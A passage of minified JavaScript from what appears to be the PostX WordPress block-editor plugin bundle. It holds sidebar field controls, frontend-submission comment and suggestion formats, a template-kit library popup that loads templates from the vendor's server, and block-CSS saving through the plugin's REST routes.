F.attributes.advFilterEnable&&"paginationAjax"===e.key&&(t=!0,n=N,i=H.p2),(0,o.createElement)(M.Z,{key:a,value:N,label:e.label,pro:e.pro,disabled:t,showDisabledValue:n,clientId:e.clientId||"",updateChild:e.updateChild||!1,help:i,onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})}})}if("typography"==e.type)return(0,o.createElement)(A.Z,{key:a,value:N,label:e.label,device:ie,setDevice:e=>ne(e),onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes({[e.key]:t})}});if("typography_toolbar"==e.type)return(0,o.createElement)(A.Z,{isToolbar:!0,key:a,value:N,label:e.label,device:ie,setDevice:e=>ne(e),onChange:t=>F.setAttributes({[e.key]:t})});if("tab"==e.type)return(0,o.createElement)(V,{key:a,tabs:e.content,activeClass:"active-tab",className:"ultp-field-wrap  ultp-tabs-field ultp-hover-tabs"},(e=>(0,o.createElement)(O,null,ve(e.options,!0,!1,!0,!0))));if("tab_toolbar"==e.type)return(0,o.createElement)(V,{key:a,tabs:e.content,className:"ultp-toolbar-tab"},(e=>(0,o.createElement)(O,null,ve(e.options,!0,!1,!0,!0))));if("toolbar_dropdown"==e.type)return(0,o.createElement)(i.Z,{key:a,options:e.options,value:N,onChange:t=>F.setAttributes({[e.key]:t}),label:e.label});if("checkbox"==e.type)return(0,o.createElement)(u.Z,{key:a,value:JSON.parse(N),label:e.label,options:e.options,onChange:t=>F.setAttributes({[e.key]:JSON.stringify(t)})});if("separator"==e.type)return(0,o.createElement)(L.Z,{key:a,label:e.label,fancy:e.fancy});if("linkbutton"==e.type){const{dcEnabled:t,dc:l}=F.attributes;return(0,o.createElement)(w.Z,{key:a,onlyLink:e.onlyLink,value:N,text:e.text,label:e.label,store:F,placeholder:e.placeholder,extraBtnAttr:e.extraBtnAttr,disableLink:(0,n.o6)()&&t&&l.linkEnabled,onChange:t=>F.setAttributes({[e.key]:t})})}if("template"==e.type)return(0,o.createElement)(B.Z,{key:a,label:e.label,store:F});if("layout"==e.type)return(0,o.createElement)(f.Z,{key:a,selector:e?.selector||"",value:N,label:e.label,col:z,pro:e.pro,tab:e.tab,block:e.block,options:e.options,onChange:t=>{if(e.variation&&t.layout){const l={};Object.keys(j.attributes).forEach(((t,o)=>{Object.keys((0,r.b)({})).includes(t)||(!e?.exclude?.includes(t)&&j.attributes[t].default?l[t]=j.attributes[t].default:l[t]=F?.attributes[t])})),F.setAttributes(e.variation?.hasOwnProperty(t.layout)?Object.assign({},l,{[e.key]:t.layout},e.variation[t.layout]):{[e.key]:t.layout})}else F.setAttributes(t)}});if("layout2"==e.type)return(0,o.createElement)(k.Z,{key:a,value:N,label:e.label,isInline:e.isInline,pro:e.pro,tab:e.tab,block:e.block,options:e.options,onChange:t=>{if(e.variation&&t.layout){const l={};Object.keys(j.attributes).forEach(((e,t)=>{Object.keys((0,r.b)({})).includes(e)||j.attributes[e].default&&(l[e]=j.attributes[e].default)})),F.setAttributes(e.variation?.hasOwnProperty(t.layout)?Object.assign({},l,{[e.key]:t.layout},e.variation[t.layout]):{[e.key]:t.layout})}else F.setAttributes(t)}});if("rowlayout"==e.type)return(0,o.createElement)(E.Z,{key:a,value:N,label:e.label,block:e.block,device:ie,setDevice:e=>ne(e),responsive:e.responsive,clientId:e.clientId,layout:e.layout,onChange:t=>{F.setAttributes({[e.key]:t})}});if("dynamicContent"===e.type)return ve(e.fields,!1);if("repetable"==e.type){const t=[...N],l={},i=e=>{l.start=e},n=e=>{l.stop=e},r=()=>{const o=t[l.start];t.splice(l.start,1),t.splice(l.stop,0,o),F.setAttributes({[e.key]:t})};return(0,o.createElement)("div",{key:a,className:"ultp-field-wrap ultp-field-sort"},e.label&&(0,o.createElement)("label",null,e.label),N.map(((l,a)=>{const s=a+1;return(0,o.createElement)("div",{key:a,className:`ultp-sort-items ${pe==s&&"active"}`,draggable:pe!=s,onDragStart:()=>i(a),onDragEnter:()=>n(a),onDragEnd:()=>r()},(0,o.createElement)("div",{className:"short-field-wrapper"},(0,o.createElement)("div",{className:"short-field-wrapper__control"},(0,o.createElement)("span",{className:"dashicons dashicons-move"})),(0,o.createElement)("div",{className:"short-field-label",onClick:()=>{ce(pe==s?"":s)}},(0,o.createElement)("div",{className:"short-field-wrapper__inside"},(0,o.createElement)("div",null,l.type)),(0,o.createElement)("span",{className:`ultp-short-collapse ${pe==s&&"active"}`,onClick:()=>{ce(pe==s?"":s)},type:"button"})),(0,o.createElement)("span",{onClick:()=>{t.splice(a,1),F.setAttributes({[e.key]:t})},className:"dashicons dashicons-no-alt ultp-sort-close"})),(0,o.createElement)("div",{className:`ultp-short-content ${pe==s&&"active"}`},ve(e.fields,!1,{parent_id:e.key,block_id:a})))})),(0,o.createElement)("button",{className:"ultp-sort-btn",onClick:()=>{const l={};Object.keys(j.attributes[e.key].fields).forEach((t=>{l[t]=j.attributes[e.key].fields[t].default})),t.push(l),F.setAttributes({[e.key]:t})}},(0,o.createElement)("span",{className:"dashicons dashicons-plus-alt2"})," ","Add New Fields"))}if("sort"==e.type){const t=[...N],l={},i=e=>{l.start=e},n=e=>{l.stop=e},r=()=>{const o=t[l.start];t.splice(l.start,1),t.splice(l.stop,0,o),F.setAttributes({[e.key]:t})};return(0,o.createElement)("div",{key:a,className:"ultp-field-wrap ultp-field-sort"},e.label&&(0,o.createElement)("label",null,e.label),N.map(((t,l)=>{const a=l+1;return(0,o.createElement)("div",{key:l,onDragStart:()=>i(l),onDragEnter:()=>n(l),onDragEnd:()=>r(),draggable:pe!=a,className:`ultp-sort-items ${pe==a&&"active"}`},(0,o.createElement)("div",{className:"short-field-wrapper"},(0,o.createElement)("div",{className:"short-field-wrapper__control"},(0,o.createElement)("span",{className:"dashicons dashicons-move"})),(0,o.createElement)("div",{className:"short-field-label",onClick:()=>{ce(pe==a?"":a)}},(0,o.createElement)("div",{className:"short-field-wrapper__inside"},(0,o.createElement)("div",null,e.options[t].label)),(0,o.createElement)("span",{className:`ultp-short-collapse ${pe==a&&"active"}`,onClick:()=>{ce(pe==a?"":a)},type:"button"})),e.options[t].action&&(0,o.createElement)("span",{onClick:()=>{F.setAttributes({[e.options[t].action]:!F.attributes[e.options[t].action]})},className:"dashicons ultp-sort-close dashicons-"+(F.attributes[e.options[t].action]?"visibility":"hidden")})),(0,o.createElement)("div",{className:`ultp-short-content ${pe==a&&"active"}`},ve(e.options[t].inner)))})))}if("search"==e.type){let t=[];N&&(0==N.indexOf("[{")?t=JSON.parse(N.replaceAll("u0022",'"')):0==N.indexOf("[")?JSON.parse(N).forEach((e=>{t.push({value:e,title:e})})):N.split(",").forEach((e=>{t.push({value:e,title:e})})));let l=e.pro;"queryPosts"==e.key&&"posts"==F.attributes.queryType&&(l=!F.attributes.queryInclude&&e.pro);let i="";switch(e.key){case"filterValue":i="###"+F.attributes.filterType;break;case"queryTaxValue":i=F.attributes.queryType+"###"+F.attributes.queryTax;break;case"queryExclude":case"queryExcludeTerm":i=F.attributes.queryType}let n=[];return"customPostType"==F.attributes.queryType&&(n=F.attributes?.queryPostType),(0,o.createElement)(S.Z,{key:a,value:t,pro:l,label:e.label,search:e.search,condition:i,postType:n,onChange:t=>F.setAttributes({[e.key]:JSON.stringify(t)})})}return"filter"==e.type?(0,o.createElement)(b.Z,{key:a,value:N,label:e.label,onChange:t=>F.setAttributes({[e.key]:t})}):"icon"==e.type?(0,o.createElement)(h.Z,{key:a,value:N,label:e.label,isSocial:e.isSocial,selection:e.selection,hideFilter:e.hideFilter,dynamicClass:e.dynamicClass,help:e.help,onChange:t=>F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})}):"advFilterEnable"===e.type?(0,o.createElement)(M.Z,{key:a,value:N,onChange:t=>{t?(F.setAttributes({[e.key]:!0,filterShow:!1,paginationAjax:!0}),(0,H.Pm)(F.clientId,F.context["post-grid-parent/postBlockClientId"])):(F.setAttributes({[e.key]:!1}),(0,H.nn)(F.clientId))},label:"Enable Advanced Filter"}):"advPagiEnable"===e.type?(0,o.createElement)(M.Z,{key:a,value:N,onChange:t=>{t?(F.setAttributes({[e.key]:!0,paginationShow:!1}),(0,H.rl)(F.clientId,F.context["post-grid-parent/postBlockClientId"])):(F.setAttributes({[e.key]:!1}),(0,H.Vn)(F.clientId))},label:"Enable Advanced Pagination"}):"notice"===e.type?(0,o.createElement)($,{status:e.status,isDismissible:e.isDismissible||!1},e.text):void 0}}))},he=re==t||"inline"===t||"no-section"==re&&l,fe=t?.replace(/ /g,"-").toLowerCase();return(0,o.createElement)(O,null,t?(0,o.createElement)("div",{className:(0,a.Z)({"ultp-section-accordion":!0,"ultp-section-accordion-show":re==t,"ultp-tab-exist":te,"ultp-section-accordion-show":!!(re==t||"no-section"==re&&l)}),id:"ultp-sidebar-"+fe},"inline"!=t?(0,o.createElement)(O,null,(0,o.createElement)("div",{className:"ultp-section-accordion-item ultp-section-control",onClick:()=>se(re==t||"no-section"==re&&l?"":t)},(0,o.createElement)("span",{className:"ultp-section-control__help"},t,W&&(0,o.createElement)(G,{placement:"top",text:"Video Tutorials"},(0,o.createElement)("a",{onClick:e=>e.stopPropagation(),href:W,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-youtube"}))),Y&&(0,o.createElement)(G,{placement:"top",text:"Documentation"},(0,o.createElement)("a",{onClick:e=>e.stopPropagation(),href:Y,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"ultp-section-control__docs dashicons dashicons-format-aside"})))),X&&(0,o.createElement)("span",{onClick:e=>e.stopPropagation(),className:"ultp-field-wrap ultp-field-toggle"},(0,o.createElement)(q,{__nextHasNoMarginBottom:!0,className:"ultp-section-control__toggle",checked:F.attributes[X],onChange:()=>F.setAttributes({[X]:!F.attributes[X]})})),re==t||"no-section"==re&&l?(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-up-alt2"}):(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-down-alt2"})),(0,o.createElement)("div",{className:(ee?"ultp-toolbar-section-show":"")+" ultp-section-show"+(re==t||"no-section"==re&&l?"":" is-hide")},j&&!ultp_data.active?(0,o.createElement)("div",{className:"ultp-pro-total"},(0,o.createElement)("div",{className:"ultp-section-pro-message"},(0,o.createElement)("span",null,__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,Z.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post")))),he&&ge(ve)):he&&ge(ve))):(0,o.createElement)("div",{className:`ultp-section-show ${ee?"ultp-toolbar-section-show":""}\n\t\t\t\t\t\t\t`},he&&ge(ve))):(0,o.createElement)(O,null,D?ve(D):ve()))}},85556:(e,t,l)=>{"use strict";var o=l(67294),a=l(87763);l(41115);const{__}=wp.i18n,{BlockControls:i}=wp.blockEditor,{ToolbarButton:n,TextControl:r,Button:s,Dropdown:p}=wp.components,{useState:c}=wp.element,{registerFormatType:u,toggleFormat:d,applyFormat:m,removeFormat:g}=wp.richText;"true"==ultp_data.settings.ultp_frontend_submission&&(u("ultimate-post/fs-comment",{title:"Frontend Submission Comment",tagName:"span",className:"ultp-fs-has-comment",attributes:{data_fs_comment:"data-fs-comment"},edit:({isActive:e,value:t,onChange:l,activeAttributes:u})=>{const[g,y]=c("");return(0,o.createElement)(o.Fragment,null,"undefined"==typeof ultpFsSettings||u.data_fs_comment?(0,o.createElement)(i,null,(0,o.createElement)(p,{contentClassName:"ultp-cs-toolbar-comment",renderToggle:({onToggle:t})=>(0,o.createElement)(n,{onClick:()=>{t()},label:"Comment",className:"ultp-cs-toolbar-comment components-toolbar-group",icon:e?a.Z.fs_comment_selected:a.Z.fs_comment}),renderContent:({onToggle:e})=>(0,o.createElement)(o.Fragment,null,u&&u.data_fs_comment&&(0,o.createElement)("div",{className:"ultp-fs-comment-view__wrapper"},(0,o.createElement)("div",{className:"ultp-fs-comment-view"},(0,o.createElement)("div",{className:"ultp-fs-comment"},u.data_fs_comment),(0,o.createElement)(s,{className:"ultp-fs-comment-resolve",onClick:()=>{const o=d(t,{type:"ultimate-post/fs-comment",attributes:{comment:""}});l(o),e()},label:"Resolve Comment"}," ",__("Resolve Comment","ultimate-post")," "))),!(u&&u.data_fs_comment)&&(0,o.createElement)("div",{className:"ultp-fs-comment-input__wrapper"},(0,o.createElement)(r,{__nextHasNoMarginBottom:!0,label:"Enter Comment",value:g,className:"ultp-fs-comment-input",onChange:e=>y(e)}),(0,o.createElement)(s,{isPrimary:!0,className:"ultp-fs-comment-btn",onClick:()=>{(()=>{const e=m(t,{type:"ultimate-post/fs-comment",attributes:{data_fs_comment:g}});l(e)})(),e()}}," ",__("Add Comment","ultimate-post"))))})):"")}}),u("ultimate-post/fs-suggestion",{title:"Frontend Submission Suggestion",tagName:"span",className:"ultp-fs-has-suggestion",attributes:{data_fs_suggestion:"data-fs-suggestion"},edit:({isActive:e,value:t,onChange:l,activeAttributes:u,...d})=>{const[y,b]=c("");return(0,o.createElement)(o.Fragment,null,"undefined"==typeof ultpFsSettings||u.data_fs_suggestion?(0,o.createElement)(i,null,(0,o.createElement)(p,{contentClassName:"ultp-cs-toolbar-comment",renderToggle:({onToggle:t})=>(0,o.createElement)(n,{onClick:()=>{t()},label:"Suggestion",className:"ultp-cs-toolbar-comment components-toolbar-group",icon:e?a.Z.fs_suggestion_selected:a.Z.fs_suggestion}),renderContent:({onToggle:e})=>(0,o.createElement)(o.Fragment,null,u&&u.data_fs_suggestion&&(0,o.createElement)("div",{className:"ultp-fs-comment-view__wrapper"},(0,o.createElement)("div",{className:"ultp-fs-comment-view"},(0,o.createElement)("div",{className:"ultp-fs-comment"},u.data_fs_suggestion),(0,o.createElement)(s,{className:"ultp-fs-comment-resolve",onClick:()=>{g(t,{type:"ultimate-post/fs-suggestion",attributes:{data_fs_suggestion:""}}),u.fs_suggestion;const o=t.text.substring(0,t.start)+u.data_fs_suggestion+t.text.substring(t.end);l(wp.richText.create({text:o})),e()}}," ",__("Accept","ultimate-post")," "))),!(u&&u.data_fs_suggestion)&&(0,o.createElement)("div",{className:"ultp-fs-comment-input__wrapper"},(0,o.createElement)(r,{__nextHasNoMarginBottom:!0,label:"Enter Suggestion",value:y,className:"ultp-fs-comment-input",onChange:e=>b(e)}),(0,o.createElement)(s,{isPrimary:!0,className:"ultp-fs-comment-btn",onClick:()=>{(()=>{const e=m(t,{type:"ultimate-post/fs-suggestion",attributes:{data_fs_suggestion:y}});l(e)})(),e()}}," ",__("Add Suggestion","ultimate-post")," ")))})):"")}}))},85701:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(67294),a=l(86008);l(60448);const{__}=wp.i18n,{parse:i}=wp.blocks,{Fragment:n,useState:r,useEffect:s,useRef:p}=wp.element,c=e=>{const[t,l]=r([]),[c,u]=r({isPopup:e.isShow||!1,starterLists:[],designs:[],starterChildLists:[],starterParentLists:[],reloadId:"",reload:!1,isStarterLists:!0,error:!1,fetching:!1,starterListsFilter:"all",designFilter:"all",current:[],sidebarOpen:!0,templatekitCol:"ultp-templatekit-col3",loading:!1}),[d,m]=r(""),g=["singular","archive","header","footer","404"].includes(ultp_data.archive),y="front_page"==ultp_data.archive,{isPopup:b,isStarterLists:v,starterListsFilter:h,designFilter:f,fetching:k,starterLists:w,designs:x}=c,T=async()=>{u({...c,loading:!0}),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"get_starter_lists_nd_design"}}).then((e=>{if(e.success&&e.data){const t=e.data;if(g||y)u({...c,current:_(JSON.parse(t.starter_lists)),loading:!1,isStarterLists:!1});else{const e=C(JSON.parse(t.design)),l=JSON.parse(t.starter_lists),{parentObj:o,childArr:a}=I(l);u({...c,starterLists:l,designs:e,current:v?l:e,loading:!1,starterChildLists:a,starterParentLists:o})}}}))},_=e=>{const t=[];return e.forEach((e=>{e.templates.forEach((l=>{let o={...l,parentID:e.ID};y?"page"==o.type&&"home_page"==o.home_page&&(o={...o},t.push(o)):"ultp_builder"==o.type&&ultp_data.archive==o.builder_type&&t.push(o)}))})),t},C=e=>{const t=[];for(const l in e)e[l].forEach((e=>{e.category=l,t.push(e)}));return t},E=e=>{27===e.keyCode&&(document.querySelector(".ultp-builder-modal").remove(),u({...c,isPopup:!1}))};s((()=>(L("","","fetchData"),document.addEventListener("keydown",E),T(),()=>document.removeEventListener("keydown",E))),[]);const S=()=>{const e=document.querySelector(".ultp-builder-modal");e.length>0&&e.remove(),u({...c,isPopup:!1})},P=async e=>{u({...c,reload:!0,reloadId:e}),window.fetch("https://ultp.wpxpo.com/wp-json/restapi/v2/single-template",{method:"POST",body:new URLSearchParams("license="+ultp_data.license+"&template_id="+e)}).then((e=>e.text())).then((e=>{(e=JSON.parse(e)).success&&e.rawData?(wp.data.dispatch("core/block-editor").insertBlocks(i(e.rawData)),S(),u({...c,isPopup:!1,reload:!1,reloadId:"",error:!1})):u({...c,error:!0})})).catch((e=>{console.error(e)}))},L=(e,t="",o="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:o}}).then((e=>{e.success&&l(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{}))}))},I=(e,t="")=>{const l=[],o={};return e.forEach(((e,t)=>{l.push(...e.templates),o[e.title]={pro:e.pro||"",live:e.live,ID:e.ID}})),{childArr:l,parentObj:o}},B=v?h:f;return(0,o.createElement)(n,null,b&&(0,o.createElement)("div",{className:"ultp-builder-modal-shadow"},(0,o.createElement)("div",{className:"ultp-popup-wrap"},(0,o.createElement)("div",{className:"ultp-popup-header"},(0,o.createElement)("div",{className:"ultp-popup-filter-title"},(0,o.createElement)("div",{className:"ultp-popup-filter-image-head"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/logo-sm.svg"}),(0,o.createElement)("span",null,__(g?"Builder Library":"Template Kits","ultimate-post"))),!g&&(0,o.createElement)("div",{className:"ultp-popup-filter-nav"},(0,o.createElement)("div",{className:"ultp-popup-tab-title"+(v?" ultp-active":""),onClick:()=>{m(""),u({...c,isStarterLists:!0,starterListsFilter:"all",current:w})}},__("Starter Packs","ultimate-post")),(0,o.createElement)("div",{className:"ultp-popup-tab-title"+(v?"":" ultp-active"),onClick:()=>{m(""),u({...c,isStarterLists:!1,designFilter:"all",current:x})}},__("Premade Patterns","ultimate-post"))),(0,o.createElement)("div",{className:"ultp-popup-filter-sync-close"},(0,o.createElement)("span",{className:"ultp-popup-sync",onClick:()=>(u({...c,fetching:!0}),void wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(T(),u({...c,fetching:!1}))})))},(0,o.createElement)("i",{className:"dashicons dashicons-update-alt"+(k?" rotate":"")}),__("Synchronize","ultimate-post")),(0,o.createElement)("button",{className:"ultp-btn-close",onClick:()=>S(),id:"ultp-btn-close"},(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}))))),(0,o.createElement)(a.Z,{filterValue:B,state:c,setState:u,useState:r,useEffect:s,useRef:p,_changeVal:(e,t)=>{t?ultp_data.active&&P(e):P(e)},splitArchiveData:(e=[],t="")=>e.filter((e=>{const l=t?Array.isArray(e.category)?e?.category?.filter((e=>"all"==t||e.slug==t)):e.category==t:e?.category.filter((e=>["singular","header","footer","404"].includes(ultp_data.archive)?e.slug==ultp_data.archive:!["singular","header","footer","404"].includes(e.slug)));return Array.isArray(l)?l?.length>0&&l:l})),setWListAction:(e,t)=>L(e,t),wishListArr:t,setWishlistArr:l,starterListModule:d,setStarterListModule:m}))))}},34285:(e,t,l)=>{"use strict";l.d(t,{R:()=>n,V:()=>r});var o=l(99838);const a=e=>{const{post_id:t,block_css:l,hasBlocks:o,preview:a,bindCss:i,src:n,fseTempId:r}=e;return"handleBindCss"==i&&(window.bindCssPostX=!0),wp.apiFetch({path:"/ultp/v1/save_block_css",method:"POST",data:{block_css:l,post_id:t,has_block:o||!1,preview:a||!1,src:n,fseTempId:r||""}}).then((e=>{"handleBindCss"==i&&setTimeout((()=>{window.bindCssPostX=!1}),100)}))};function i(e,t={}){const{blocks:l,pId:n,preview:r}=e;return l?.forEach((e=>{const{attributes:l,name:s}=e;"ultimate-post"===s.split("/")[0]&&l.blockId&&(t[n]=(t[n]||"")+(0,o.Kh)(l,s,l.blockId,!0)),e.innerBlocks&&e.innerBlocks.length>0&&i({blocks:e.innerBlocks,pId:n,preview:r},t),-1!=e.name?.indexOf("core/block")?setTimeout((()=>{!function({pId:e,preview:t}){wp.apiFetch({path:"/ultp/v1/get_other_post_content",method:"POST",data:{postId:e}}).then((t=>{if(t.success){const l=t.data?.includes("ultimate-post")?i({blocks:wp.blocks.parse(t.data),pId:e}):{[e]:""};a({post_id:e,block_css:l[e],hasBlocks:!!l[e],preview:!1,src:"wpBlock"}).then((e=>{}))}}))}({pId:l?.ref,preview:r})}),700):"core/template-part"==e.name&&setTimeout((()=>{!function(e){const{slug:t,theme:l,preview:o}=e,n=(wp.data.select("core")?.getEntityRecords("postType","wp_template_part",{per_page:-1})||[]).find((e=>e.id==l+"//"+t)),r=n?.wp_id;wp.apiFetch({path:"/ultp/v1/get_other_post_content",method:"POST",data:{postId:r}}).then((e=>{if(e.success){const t=e.data?.includes("ultimate-post")?i({blocks:wp.blocks.parse(e.data),pId:r}):{[r]:""};a({post_id:r,block_css:t[r],hasBlocks:!!t[r],preview:!1,src:"partCss"}).then((e=>{}))}}))}({slug:l?.slug,theme:l?.theme,preview:r})}),700)})),t}const n=(e={})=>{const{preview:t=!1,handleBindCss:l=!0}=e,o=wp.data.select("core/block-editor").getBlocks(),{getCurrentPostId:n}=wp.data.select("core/editor");let r=n();const s=wp.data.select("core/edit-site"),p=s?.getEditedPostType()||"";if(p){const e=wp.data.select("core");e?.getEntityRecords("postType","wp_template_part",{per_page:-1}),e?.getEntityRecords("postType","wp_template",{per_page:-1});let n="";if("string"==typeof r&&r.includes("//")){n="wp_template"==p?r:"";const t=(e?.getEntityRecords("postType",p,{per_page:-1})||[]).find((e=>e.id==r));r=t?.wp_id}const c=i({blocks:o,pId:r,preview:t});a({post_id:r,block_css:c[r],hasBlocks:!!c[r],preview:t,bindCss:l?"handleBindCss":"",src:"fse_type",fseTempId:n}).then((e=>{}));const u=s?.getPage();if(u?.hasOwnProperty("context")&&u?.context?.postId){const e=u.context.postId,o=i({blocks:wp.data.select("core").getEditedEntityRecord("postType",u.context?.postType,u.context?.postId)?.blocks||[],pId:e,preview:t});a({post_id:e,block_css:o[e],hasBlocks:!!o[e],preview:t,bindCss:l?"handleBindCss":"",src:"fse_pageId"}).then((e=>{}))}}else{const e=i({blocks:o,pId:r,preview:t});a({post_id:r,block_css:e[r],hasBlocks:!!e[r],preview:t,bindCss:l?"handleBindCss":"",src:"all_editor"}).then((e=>{}))}},r=e=>{let t="";const{getBlockAttributes:l}=wp.data.select("core/block-editor");e.forEach((e=>{const a=l(e.id);t+=(0,o.Kh)(a,e.name,a.blockId,!0)})),a({post_id:"ultp-widget",block_css:t,hasBlocks:!!t,preview:!1,src:"widget"}).then((e=>{}))}},92637:(e,t,l)=>{"use strict";l.r(t),l.d(t,{Section:()=>s,Sections:()=>n,SectionsNoTab:()=>r});var o=l(67294);l(87624);const{__}=wp.i18n,{Fragment:a,useState:i}=wp.element,n=e=>{const{children:t,callback:l,classes:n,settingTab:r=!1,setSettingTab:s=(()=>{})}=e,[p,c]=i("setting"==r?"setting":t[0].props.slug);r&&r!=p&&c("setting");const u=(e,l)=>{if(!e)return"";const o=t.findIndex((e=>e?.props?.slug===p)),a=["ultp-section-title"];return e.props.slug===p?a.push("active"):-1!==o&&(l===o-1?(a.push("active-prev"),(2==t.length&&0==l||4==t.length&&1==l)&&a.push("active-prev-sm")):l===o+1&&(a.push("active-next"),(4==t.length&&2==l||2==t.length&&1==l)&&a.push("active-next-sm"))),a.join(" ")};return(0,o.createElement)("div",{className:`ultp-section-tab ${n||""}`},(0,o.createElement)("div",{className:"ultp-section-wrap"},(0,o.createElement)("div",{className:"ultp-section-wrap-inner"},t.map(((e,t)=>e?(0,o.createElement)("div",{key:t,className:u(e,t),onClick:()=>{"setting"!=e.props.slug&&s(""),c(e.props.slug),l&&l({slug:e.props.slug})}},(0,o.createElement)("span",{className:"ultp-section-title-overlay"}),(0,o.createElement)("span",{className:"ultp-section-title-text"},e.props.title)):(0,o.createElement)(a,{key:t}))))),t.map(((e,t)=>(0,o.createElement)("div",{key:t,className:`ultp-section-content ${e?.props?.slug===p?" active":""} ultp-section-group-${e?.props?.slug}`},e))))},r=({children:e})=>(0,o.createElement)("div",{className:"ultp-section-tab ultp-section-without-tab"},e),s=e=>{const{children:t}=e;return(0,o.createElement)(a,null,Array.isArray(t)?t.map((e=>e)):t)}},43581:(e,t,l)=>{"use strict";l.r(t),l.d(t,{default:()=>s});var o=l(67294),a=l(64766),i=l(18958);l(26135);const{__}=wp.i18n,{Modal:n}=wp.components,{useState:r}=wp.element,s=({store:e,prev:t,designLibrary:l=!0})=>{const[s,p]=r(!1),c=()=>p(!1);return(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-ready-design"},(0,o.createElement)("div",null,l&&(0,o.createElement)("button",{className:"ultp-ready-design-btns patterns",onClick:()=>p(!0)},a.ZP.eye,__("Premade Design","ultimate-post")," "),(0,o.createElement)("a",{className:"ultp-ready-design-btns preview",target:"_blank",href:t,rel:"noreferrer"},a.ZP.eye,__("Examples","ultimate-post")))),s&&(0,o.createElement)(n,{isFullScreen:!0,onRequestClose:c},(0,o.createElement)(i.Z,{store:e,closeModal:c})))}},12402:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(64201);const a=({searchQuery:e,setSearchQuery:t,setTemplateModule:l,changeStates:a})=>(0,o.createElement)("div",{className:"ultp-design-search-wrapper"},(0,o.createElement)("input",{type:"search",id:"ultp-design-search-form",className:"ultp-design-search-input",placeholder:"Search for...",value:e,onChange:e=>{t&&t(e.target.value),l&&l(""),a&&a("search",e.target.value)}}))},31760:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(17024),i=l(53049),n=l(64766),r=l(13448),s=l(18958),p=l(87763);l(88106);const{__}=wp.i18n,{useState:c}=wp.element,{BlockControls:u}=wp.blockEditor,{Modal:d,ToolbarGroup:m,Dropdown:g,ToolbarButton:y}=wp.components,b=((0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 200 108"},(0,o.createElement)("path",{d:"M179 54a33 33 0 0 1-65 8l-8-24a54 54 0 1 0-32 66l-8-19a33 33 0 1 1 20-39l8 22a54 54 0 1 0 32-64l8 19a33 33 0 0 1 45 31Z"})),e=>{const{include:t,store:l}=e,[b,v]=c(!1),h=()=>v(!0),f=()=>v(!1);return(0,o.createElement)(u,{className:"ultp-block-toolbar"},t.map(((t,c)=>{if("template"==t.type)return(0,o.createElement)(m,{key:c},(0,o.createElement)(y,{className:"ultp-toolbar-template__btn",onClick:h,label:"Patterns"},(0,o.createElement)("span",{className:"dashicons dashicons-images-alt2"})),b&&(0,o.createElement)(d,{isFullScreen:!0,onRequestClose:f},(0,o.createElement)(s.Z,{store:l,closeModal:f})));if("layout"==t.type)return(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-layout-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)(y,{label:"Layout",onClick:()=>e()},(0,o.createElement)("span",{className:"dashicons dashicons-schedule"})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)(i.Ar,{title:"inline",store:l,block:t.block,options:t.options,col:t.col,data:t}))}));if("layout+adv_style"==t.type){const{layoutData:e,advStyleData:a}=t;return(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-layout-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)(y,{label:"Layout & Advance Style",onClick:()=>e()},(0,o.createElement)("span",{className:"dashicons dashicons-schedule"})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)(i.Ar,{title:"inline",store:l,block:e.block,col:e.col,data:e}),(0,o.createElement)(i.Ar,{title:"inline",store:l,block:a.block,col:a.col,data:a}))}))}return"query"==t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-query-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-query-toolbar__btn"},(0,o.createElement)(y,{label:"Query",className:"ultp-toolbar-add-new",onClick:()=>e()},"Post Sorting")),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},t.taxQuery?(0,o.createElement)(i.$o,{title:"inline",store:l}):(0,o.createElement)(i.lA,{dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:t.exclude,title:"inline",store:l}))})):"grid_align"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(i.lj,{store:l,attrKey:t.key,options:i.M9,label:__("Grid Content 